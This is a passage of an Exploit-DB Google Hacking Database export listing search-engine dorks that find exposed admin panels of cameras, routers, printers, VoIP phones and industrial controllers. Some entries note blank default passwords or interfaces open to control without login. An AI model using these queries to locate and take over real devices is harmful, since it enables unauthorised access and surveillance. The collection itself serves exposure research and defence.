<querystring>https://www.google.com/search?q=intitle:%22OfficeConnect+Wireless+11g+Access+Point%22+%22Checking+your+browser%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4343</id>
<link>https://www.exploit-db.com/ghdb/4343</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;open webif&quot; &quot;Linux set-top-box&quot;</shortDescription>
<textualDescription>Web interface that allows full control of Dreambox TV set-top-boxes.
</textualDescription>
<query>intitle:&quot;open webif&quot; &quot;Linux set-top-box&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;open webif&quot; &quot;Linux set-top-box&quot;</querystring>
<edb></edb>
<date>2016-10-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6854</id>
<link>https://www.exploit-db.com/ghdb/6854</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;openHAB&quot; intext:&quot;Welcome to openHAB&quot; &quot;Basic UI&quot; &quot;Paper UI&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;openHAB&quot; intext:&quot;Welcome to openHAB&quot; &quot;Basic UI&quot; &quot;Paper UI&quot;
# Various Online Devices
# Date: 25/03/2021
# Exploit Author: Mugdha Peter Bansode
--
Thanks &amp; Regards,
Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;openHAB&quot; intext:&quot;Welcome to openHAB&quot; &quot;Basic UI&quot; &quot;Paper UI&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;openHAB&quot; intext:&quot;Welcome to openHAB&quot; &quot;Basic UI&quot; &quot;Paper UI&quot;</querystring>
<edb></edb>
<date>2021-04-05</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>5525</id>
<link>https://www.exploit-db.com/ghdb/5525</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;openshift web console&quot; inurl:console inurl:/console</shortDescription>
<textualDescription>Openshift Web Console
# Google Dork: intitle:&quot;openshift web console&quot; inurl:console inurl:/console
# Date: [12-09-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:&quot;openshift web console&quot; inurl:console inurl:/console</query>
<querystring>https://www.google.com/search?q=intitle:&quot;openshift web console&quot; inurl:console inurl:/console</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>6913</id>
<link>https://www.exploit-db.com/ghdb/6913</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Openstage IP Phone User&quot; &quot;IPv4&quot; &quot;DNS&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Openstage IP Phone User&quot; &quot;IPv4&quot; &quot;DNS&quot;
# Siemens Openstage brand IP phones.
# Date: 29/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Openstage IP Phone User&quot; &quot;IPv4&quot; &quot;DNS&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Openstage IP Phone User&quot; &quot;IPv4&quot; &quot;DNS&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1123</id>
<link>https://www.exploit-db.com/ghdb/1123</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Orite IC301&quot; | intitle:&quot;ORITE Audio IP-Camera IC-301&quot; -the -a</shortDescription>
<textualDescription>This search finds orite 301 netcams with audio capabilities.</textualDescription>
<query>intitle:&quot;Orite IC301&quot; | intitle:&quot;ORITE Audio IP-Camera IC-301&quot; -the -a</query>
<querystring>https://www.google.com/search?q=intitle:%22Orite+IC301%22+%7C+intitle:%22ORITE+Audio+IP-Camera+IC-301%22+-the+-a&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7313</id>
<link>https://www.exploit-db.com/ghdb/7313</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;
# Various Online Devices
# Date: 10/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>989</id>
<link>https://www.exploit-db.com/ghdb/989</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;PacketShaper Customer Login&quot;</shortDescription>
<textualDescription>PacketShaper Login.Provides login access for PacketShaper Customers.</textualDescription>
<query>intitle:&quot;PacketShaper Customer Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22PacketShaper+Customer+Login%22+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-05-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5232</id>
<link>https://www.exploit-db.com/ghdb/5232</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Pi-hole Admin Console&quot;</shortDescription>
<textualDescription>Description: Find Pi-Hole Admin Consoles
Author: Fabio Stoll (Fastor)
</textualDescription>
<query>intitle:&quot;Pi-hole Admin Console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pi-hole Admin Console&quot;</querystring>
<edb></edb>
<date>2019-05-30</date>
<author>Fabio Stoll</author>
</entry>
<entry>
<id>8001</id>
<link>https://www.exploit-db.com/ghdb/8001</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Pi-hole-ip&quot; inurl:admin</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Pi-hole-ip&quot; inurl:admin
# Various Online Devices
# Date:25/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;Pi-hole-ip&quot; inurl:admin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pi-hole-ip&quot; inurl:admin</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6863</id>
<link>https://www.exploit-db.com/ghdb/6863</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Polycom Login&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Polycom Login&quot; -.com
# Various online devices (Polycom Video Conferencing).
# Date: 08/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Polycom Login&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Polycom Login&quot; -.com</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6810</id>
<link>https://www.exploit-db.com/ghdb/6810</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;PowerLogic ION&quot; + &quot;Control&quot; + &quot;Diagnostic&quot; + &quot;Home&quot; + &quot;Maintenance&quot; + &quot;Monitoring&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;PowerLogic ION&quot; + &quot;Control&quot; + &quot;Diagnostic&quot; + &quot;Home&quot; + &quot;Maintenance&quot; + &quot;Monitoring&quot;
# Various online devices (Power Meter PLC).
# Date: 25/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;PowerLogic ION&quot; + &quot;Control&quot; + &quot;Diagnostic&quot; + &quot;Home&quot; + &quot;Maintenance&quot; + &quot;Monitoring&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;PowerLogic ION&quot; + &quot;Control&quot; + &quot;Diagnostic&quot; + &quot;Home&quot; + &quot;Maintenance&quot; + &quot;Monitoring&quot;</querystring>
<edb></edb>
<date>2021-02-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5866</id>
<link>https://www.exploit-db.com/ghdb/5866</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Printer Status&quot; AND inurl:&quot;/PrinterStatus.html&quot;</shortDescription>
<textualDescription># Dork #
intitle:&quot;Printer Status&quot; AND inurl:&quot;/PrinterStatus.html&quot;
Various Online Devices- for Lexmark/Dell Printer.
</textualDescription>
<query>intitle:&quot;Printer Status&quot; AND inurl:&quot;/PrinterStatus.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Printer Status&quot; AND inurl:&quot;/PrinterStatus.html&quot;</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>6861</id>
<link>https://www.exploit-db.com/ghdb/6861</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Properties - Xerox WorkCentre&quot; &quot;Machine Model:&quot; &quot;Machine Name&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Properties - Xerox WorkCentre&quot; &quot;Machine Model:&quot; &quot;Machine Name&quot; -.com
# Various online devices (Xerox printers).
# Date: 13/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Properties - Xerox WorkCentre&quot; &quot;Machine Model:&quot; &quot;Machine Name&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Properties - Xerox WorkCentre&quot; &quot;Machine Model:&quot; &quot;Machine Name&quot; -.com</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7111</id>
<link>https://www.exploit-db.com/ghdb/7111</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;PRTG Network Monitor&quot; inurl:index.htm intext:&quot;Password&quot; -inurl:prtg</shortDescription>
<textualDescription># Google Dork: intitle:&quot;PRTG Network Monitor&quot; inurl:index.htm intext:&quot;Password&quot; -inurl:prtg
# Category: Various Online Devices
# Date: 31/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;PRTG Network Monitor&quot; inurl:index.htm intext:&quot;Password&quot; -inurl:prtg</query>
<querystring>https://www.google.com/search?q=intitle:&quot;PRTG Network Monitor&quot; inurl:index.htm intext:&quot;Password&quot; -inurl:prtg</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7246</id>
<link>https://www.exploit-db.com/ghdb/7246</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Pyramid Debug Toolbar&quot; inurl:_debug_toolbar</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Pyramid Debug Toolbar&quot; inurl:_debug_toolbar
# Various Online Devices
# Date: 31/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Pyramid Debug Toolbar&quot; inurl:_debug_toolbar</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pyramid Debug Toolbar&quot; inurl:_debug_toolbar</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>s Thakur</author>
</entry>
<entry>
<id>3810</id>
<link>https://www.exploit-db.com/ghdb/3810</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Pyxis Mobile Test Page&quot; inurl:&quot;mpTest.aspx&quot;</shortDescription>
<textualDescription>Pyxis Mobile Test Page
intitle:&quot;Pyxis Mobile Test Page&quot; inurl:&quot;mpTest.aspx&quot;</textualDescription>
<query>intitle:&quot;Pyxis Mobile Test Page&quot; inurl:&quot;mpTest.aspx&quot;</query>
<querystring>https://www.google.com/search?q=Pyxis Mobile Test Page</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6974</id>
<link>https://www.exploit-db.com/ghdb/6974</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Remote UI&quot; intext:&quot;Printer status&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Remote UI&quot; intext:&quot;Printer status&quot;
# Various Online Devices
# Date: 31/05/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Remote UI&quot; intext:&quot;Printer status&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Remote UI&quot; intext:&quot;Printer status&quot;</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6815</id>
<link>https://www.exploit-db.com/ghdb/6815</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Remote UI: Login:&quot; &quot;System Manager ID:&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Remote UI: Login:&quot; &quot;System Manager ID:&quot;
# Various online devices (Canon printer servers).
# Date: 02/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Remote UI: Login:&quot; &quot;System Manager ID:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Remote UI: Login:&quot; &quot;System Manager ID:&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4241</id>
<link>https://www.exploit-db.com/ghdb/4241</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Residential Gateway Configuration:&quot; intext:&quot;Cable Modem Information.&quot;</shortDescription>
<textualDescription>Various online cable modem devices! More info:
http://www.ubeeinteractive.com
Author: Augusto Pereira
http://www.augustopereira.com.br
</textualDescription>
<query>intitle:&quot;Residential Gateway Configuration:&quot; intext:&quot;Cable Modem Information.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Residential Gateway Configuration:&quot; intext:&quot;Cable Modem Information.&quot;</querystring>
<edb></edb>
<date>2016-03-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6520</id>
<link>https://www.exploit-db.com/ghdb/6520</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Rockwell Automation&quot; inurl:&quot;index.html&quot; &quot;Device Name&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Rockwell Automation&quot; inurl:&quot;index.html&quot; &quot;DeviceName&quot;
# Rockwell Automation PLC dashboards.
# Date: 26/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Rockwell Automation&quot; inurl:&quot;index.html&quot; &quot;Device Name&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Rockwell Automation&quot; inurl:&quot;index.html&quot; &quot;Device Name&quot;</querystring>
<edb></edb>
<date>2020-09-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7973</id>
<link>https://www.exploit-db.com/ghdb/7973</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Roteador Wireless&quot; inurl:login.asp</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Roteador Wireless&quot; inurl:login.asp
# Category: Various Online Devices
# Date: 14/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Roteador Wireless&quot; inurl:login.asp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Roteador Wireless&quot; inurl:login.asp</querystring>
<edb></edb>
<date>2022-07-19</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4128</id>
<link>https://www.exploit-db.com/ghdb/4128</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;router&quot;inurl:&quot;home.asp&quot;</shortDescription>
<textualDescription>Few routers that can be accessed without login</textualDescription>
<query>intitle:&quot;router&quot;inurl:&quot;home.asp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;router&quot;inurl:&quot;home.asp&quot;</querystring>
<edb></edb>
<date>2015-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3890</id>
<link>https://www.exploit-db.com/ghdb/3890</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;RouterOS router configuration page&quot;</shortDescription>
<textualDescription>Returns login portals for Microtik routers running RouterOS version 5
and up.
4N6 Security</textualDescription>
<query>intitle:&quot;RouterOS router configuration page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;RouterOS router configuration page&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3916</id>
<link>https://www.exploit-db.com/ghdb/3916</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;RT at a glance&quot; intext:&quot;quick search&quot;</shortDescription>
<textualDescription>RT Request Tracker Ticket Database
http://www.bestpractical.com/rt/
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>intitle:&quot;RT at a glance&quot; intext:&quot;quick search&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;RT at a glance&quot; intext:&quot;quick search&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6865</id>
<link>https://www.exploit-db.com/ghdb/6865</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Saia PCD Web-Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Saia PCD Web-Server&quot;
# Various Online Devices
# Date: 07/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Saia PCD Web-Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Saia PCD Web-Server&quot;</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>5088</id>
<link>https://www.exploit-db.com/ghdb/5088</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Screenly OSE&quot; intext:&quot;Schedule Overview&quot; AND &quot;Active Assets&quot; AND &quot;Inactive Assets&quot;</shortDescription>
<textualDescription>Dork about Screenly OSE
Is the most popular open source digital signage software for the Raspberry Pi
intitle:&quot;Screenly OSE&quot; intext:&quot;Schedule Overview&quot; AND &quot;Active Assets&quot; AND &quot;Inactive Assets&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:&quot;Screenly OSE&quot; intext:&quot;Schedule Overview&quot; AND &quot;Active Assets&quot; AND &quot;Inactive Assets&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Screenly OSE&quot; intext:&quot;Schedule Overview&quot; AND &quot;Active Assets&quot; AND &quot;Inactive Assets&quot;</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>7818</id>
<link>https://www.exploit-db.com/ghdb/7818</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Secure Access Service&quot; inurl:&quot;/dana-na/auth/url_default/welcome.cgi&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Secure Access Service&quot; inurl:&quot;/dana-na/auth/url_default/welcome.cgi&quot;
# Various Online Devices
# Date:16/11/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>intitle:&quot;Secure Access Service&quot; inurl:&quot;/dana-na/auth/url_default/welcome.cgi&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Secure Access Service&quot; inurl:&quot;/dana-na/auth/url_default/welcome.cgi&quot;</querystring>
<edb></edb>
<date>2021-11-16</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>901</id>
<link>https://www.exploit-db.com/ghdb/901</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Service Managed Gateway Login&quot;</shortDescription>
<textualDescription>service Managed Gateway from VirtualAccess login page</textualDescription>
<query>intitle:&quot;Service Managed Gateway Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Service+Managed+Gateway+Login%22+&amp;c2coff=1&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4524</id>
<link>https://www.exploit-db.com/ghdb/4524</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Setup Home&quot; &quot;Internet Status&quot; -belkin</shortDescription>
<textualDescription>Finds lots of internet-connected Arris routers
Dxtroyer</textualDescription>
<query>intitle:&quot;Setup Home&quot; &quot;Internet Status&quot; -belkin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Setup Home&quot; &quot;Internet Status&quot; -belkin</querystring>
<edb></edb>
<date>2017-06-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>813</id>
<link>https://www.exploit-db.com/ghdb/813</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Setup Home&quot; &quot;You will need * log in before * * change * settings&quot;</shortDescription>
<textualDescription>This should reveal Belkin routers. Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfuly informs the attacker of this).Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security.</textualDescription>
<query>intitle:&quot;Setup Home&quot; &quot;You will need * log in before * * change * settings&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Setup+Home%22+%22You+will+need+*+log+in+before+*+*+change+*+settings%22</querystring>
<edb></edb>
<date>2005-01-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7148</id>
<link>https://www.exploit-db.com/ghdb/7148</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;setup&quot; &quot;Network setup&quot; &quot;DHCP Client ID&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;setup&quot; &quot;Network setup&quot; &quot;DHCP Client ID&quot; -.com
# Various Online Devices
# Date: 31/08/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;setup&quot; &quot;Network setup&quot; &quot;DHCP Client ID&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;setup&quot; &quot;Network setup&quot; &quot;DHCP Client ID&quot; -.com</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6411</id>
<link>https://www.exploit-db.com/ghdb/6411</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SFXAdmin - sfx_global&quot; intext:&quot;Login Form&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SFXAdmin - sfx_global&quot; intext:&quot;Login Form&quot;
# Various pages containing login portals.
# Date: 3/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;SFXAdmin - sfx_global&quot; intext:&quot;Login Form&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SFXAdmin - sfx_global&quot; intext:&quot;Login Form&quot;</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>797</id>
<link>https://www.exploit-db.com/ghdb/797</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Sipura.SPA.Configuration&quot; -.pdf</shortDescription>
<textualDescription>Query returns configuration pages for online Voice over IP devices. Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system.</textualDescription>
<query>intitle:&quot;Sipura.SPA.Configuration&quot; -.pdf</query>
<querystring>https://www.google.com/search?q=intitle:%22Sipura.SPA.Configuration%22+-.pdf&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1284</id>
<link>https://www.exploit-db.com/ghdb/1284</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Skystream Networks Edge Media Router&quot; -securitytracker.com</shortDescription>
<textualDescription>skystream Networks Edge Media Router.</textualDescription>
<query>intitle:&quot;Skystream Networks Edge Media Router&quot; -securitytracker.com</query>
<querystring>https://www.google.com/search?q=intitle:%22Skystream+Networks+Edge+Media+Router%22+-securitytracker.com&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>709</id>
<link>https://www.exploit-db.com/ghdb/709</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Smoothwall Express&quot; inurl:cgi-bin &quot;up * days&quot;</shortDescription>
<textualDescription>smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment).</textualDescription>
<query>intitle:&quot;Smoothwall Express&quot; inurl:cgi-bin &quot;up * days&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Smoothwall+Express%22+inurl%3Acgi-bin+%22up+*+days%22</querystring>
<edb></edb>
<date>2004-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1210</id>
<link>https://www.exploit-db.com/ghdb/1210</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Snap Server&quot; intitle:&quot;Home&quot; &quot;Active Users&quot;</shortDescription>
<textualDescription>This an online device, you can search for unpassworded shares on Snap Appliance Server.Moderator notes:This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=2784&amp;highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=180</textualDescription>
<query>intitle:&quot;Snap Server&quot; intitle:&quot;Home&quot; &quot;Active Users&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Snap+Server%22+intitle%3A%22Home%22+%22Active+Users%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1385</id>
<link>https://www.exploit-db.com/ghdb/1385</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SNC-RZ30 HOME&quot; -demo</shortDescription>
<textualDescription>This search will reveal Sony's SNC-RZ30 IP camera's web interface. Quite a few of these cameras have not been configured to deny you control. These are not only cameras in the US but may include cameras abroad.Including: University Security CamerasForeign government camerasI've seen cameras monitoring submarines.You may also use this in place of SNC-RZ30, but they don't yield as many results.SNC-CS3 SNC-RZ25SNC-DF40 SNC-RZ30SNC-DF70 SNC-VL10SNC-P1 SNC-Z20</textualDescription>
<query>intitle:&quot;SNC-RZ30&quot; -demo</query>
<querystring>https://www.google.com/search?q=intitle%3A%22SNC-RZ30+HOME%22+-demo</querystring>
<edb></edb>
<date>2006-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>1192</id>
<link>https://www.exploit-db.com/ghdb/1192</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SNOIE Intel Web Netport Manager&quot; OR intitle:&quot;Intel Web Netport Manager Setup/Status&quot;</shortDescription>
<textualDescription>Intel Netport Express Print Server.</textualDescription>
<query>intitle:&quot;SNOIE Intel Web Netport Manager&quot; OR intitle:&quot;Intel Web Netport Manager Setup/Status&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22SNOIE+Intel+Web+Netport+Manager%22+OR+intitle%3A%22Intel+Web+Netport+Manager+Setup%2FStatus%22</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>6981</id>
<link>https://www.exploit-db.com/ghdb/6981</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Solar-Log™&quot; intext:&quot;Build Revision&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Solar-Log™&quot; intext:&quot;Build Revision&quot;
# Various Online Devices
# Date: 03/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Solar-Log™&quot; intext:&quot;Build Revision&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Solar-Log™&quot; intext:&quot;Build Revision&quot;</querystring>
<edb></edb>
<date>2021-06-03</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4111</id>
<link>https://www.exploit-db.com/ghdb/4111</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Solr Admin&quot; &quot;Core Admin&quot; &quot;Thread Dump&quot;</shortDescription>
<textualDescription>Apache Solr admin interfaces.
- Andy G - twitter.com/vxhex</textualDescription>
<query>intitle:&quot;Solr Admin&quot; &quot;Core Admin&quot; &quot;Thread Dump&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Solr Admin&quot; &quot;Core Admin&quot; &quot;Thread Dump&quot;</querystring>
<edb></edb>
<date>2015-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1203</id>
<link>https://www.exploit-db.com/ghdb/1203</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Sony SNT-V304 Video Network Station&quot; inurl:hsrindex.shtml</shortDescription>
<textualDescription>The SNT-V304 Video Network Station.Sony's network camera control station.</textualDescription>
<query>intitle:&quot;Sony SNT-V304 Video Network Station&quot; inurl:hsrindex.shtml</query>
<querystring>https://www.google.com/search?q=intitle:%22Sony+SNT-V304+Video+Network+Station%22+inurl:hsrindex.shtml&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7206</id>
<link>https://www.exploit-db.com/ghdb/7206</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SoundTouch Access Point Setup&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SoundTouch Access Point Setup&quot;
# Various Online Devices
# Date: 10/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>intitle:&quot;SoundTouch Access Point Setup&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SoundTouch Access Point Setup&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>3887</id>
<link>https://www.exploit-db.com/ghdb/3887</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;SPA504G Configuration&quot;</shortDescription>
<textualDescription>Dork : intitle:&quot;SPA504G Configuration&quot;
Result : Gives access to Cisco SPA504G Configuration Utility for IP phones
Screenshot Google Dork
Dork found by :
redN00ws</textualDescription>
<query>intitle:&quot;SPA504G Configuration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SPA504G Configuration&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>769</id>
<link>https://www.exploit-db.com/ghdb/769</link>
